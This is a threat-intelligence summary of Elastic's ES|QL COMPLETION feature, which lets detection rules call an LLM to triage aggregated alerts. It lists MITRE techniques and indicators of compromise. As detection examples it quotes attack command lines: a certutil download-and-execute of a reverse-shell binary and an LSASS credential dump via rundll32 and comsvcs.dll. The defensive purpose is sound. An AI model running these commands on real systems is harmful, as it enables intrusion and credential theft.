Elastic’s ES|QL COMPLETION embeds LLM inference directly into ES|QL queries so detection rules can reason about contextual behavior inline, reducing the need for extensive exception lists and external orchestration. #ESQL_COMPLETION #SCCM
Keypoints
- ES|QL COMPLETION allows LLM reasoning to run inside query execution, enabling detection logic to evaluate context and produce structured verdicts without external orchestration.
- The pattern aggregates related alerts (by host or user), builds a structured context string, calls COMPLETION for judgment, parses the response, and filters on verdict/confidence before alerting.
- Prebuilt rules (LLM-Based Attack Chain Triage by Host and LLM-Based Compromised User Triage by User) demonstrate triage for host- and user-centric scenarios and are available in the detection-rules repository.
- Real examples show the LLM distinguishing benign enterprise activity (SCCM, Citrix, Nessus scans) from true attacks (certutil download-and-execute, LSASS memory dumps) using command lines, parent processes, and file paths.
- COMPLETION supports both Elastic Cloud models and connectors to Azure OpenAI, Amazon Bedrock, OpenAI, and Google Vertex, with configuration via the LLM connector documentation.
- Built-in safeguards include a 100-row per execution limit and guidelines to use LIMIT and thresholds to control cost and scale when sending contexts to the LLM.
- Testing via ROW with known examples is recommended to iterate prompts and validate structured outputs before deploying to production.
MITRE Techniques
- [T1059.001 ] PowerShell – Execution of PowerShell for scripting and payload delivery as seen in command lines (‘”PowerShell.exe” -NoLogo -Noninteractive -NoProfile -ExecutionPolicy Bypass “& ‘C:WINDOWSCCMSystemTemp0b109ff.ps1′”‘).
- [T1046 ] Network Service Discovery – Use of ARP and network enumeration for discovery as shown (‘arp -a’).
- [T1105 ] Ingress Tool Transfer – Downloading payloads from network locations using utilities (download-and-execute pattern) as in (‘certutil.exe -f -urlcache -split http://10.100.100.10:9090/revershell.exe c:windowstemprevershell.exe’).
- [T1003.001 ] LSASS Memory – Credential dumping via LSASS memory techniques and comsvcs.dll mini-dump behavior (‘rundll32.exe C:windowsSystem32comsvcs.dll, #+000024 596 WindowsTempksR443WnM.vhdx full’).
- [T1218.011 ] Signed Binary Proxy Execution (rundll32) – Abuse of rundll32 to execute malicious payloads or DLL routines as evidenced by (‘rundll32.exe C:windowsSystem32comsvcs.dll, #+000024 …’).
- [T1059 ] Command and Scripting Interpreter – Use of command interpreters and scripted commands (cmd.exe, PowerShell) to run tools and orchestrate actions (‘cmd.exe /c c:windowstemprevershell.exe’).
Indicators of Compromise
- [IP Address ] download/C2 and scanner endpoints – 10.100.100.10, 192.168.1.100
- [File names/paths ] observed payloads and scanner artifacts – c:windowstemprevershell.exe, C:WindowsTEMPnessus_enumerate_ms_azure_vm.txt
- [Process/Executable names ] parent/launcher processes and tools seen in alerts – CcmExec.exe, certutil.exe
- [DLL/Library paths ] libraries used in credential access and load-time execution – C:windowsSystem32comsvcs.dll, C:WindowsCCMSystemTemp0b109ff.ps1